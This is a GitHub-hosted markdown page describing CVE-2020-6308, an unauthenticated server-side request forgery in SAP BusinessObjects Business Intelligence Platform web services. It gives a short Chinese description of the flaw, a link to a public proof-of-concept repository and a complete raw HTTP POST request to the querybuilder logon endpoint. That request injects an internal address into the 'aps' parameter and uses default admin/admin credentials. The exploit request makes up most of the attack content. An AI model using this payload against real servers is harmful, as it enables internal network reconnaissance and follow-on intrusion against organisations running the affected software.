Skip to content

Latest commit

 

History

History
27 lines (20 loc) · 1.31 KB

CVE-2020-6308 SAP POC.md

File metadata and controls

27 lines (20 loc) · 1.31 KB

CVE-2020-6308 SAP POC

SAP BusinessObjects Business Intelligence平台(Web服务)版本-410、420、430允许未经身份验证的攻击者注入任意值作为CMS参数,以在内部网络上执行查找,否则将无法从外部访问该内部网络。成功利用后,攻击者可以扫描内部网络以确定内部基础结构,并收集信息以进行进一步的攻击,例如远程文件包含,检索服务器文件,绕过防火墙并迫使易受攻击的服务器执行恶意请求,从而导致服务器端请求伪造漏洞。

详情参考:https://github.com/InitRoot/CVE-2020-6308-PoC

PoC:

POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: 192.168.0.191:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: http://192.168.0.191:8080
Connection: close
Referer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jsp
Upgrade-Insecure-Requests: 1

aps=192.168.0.191&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp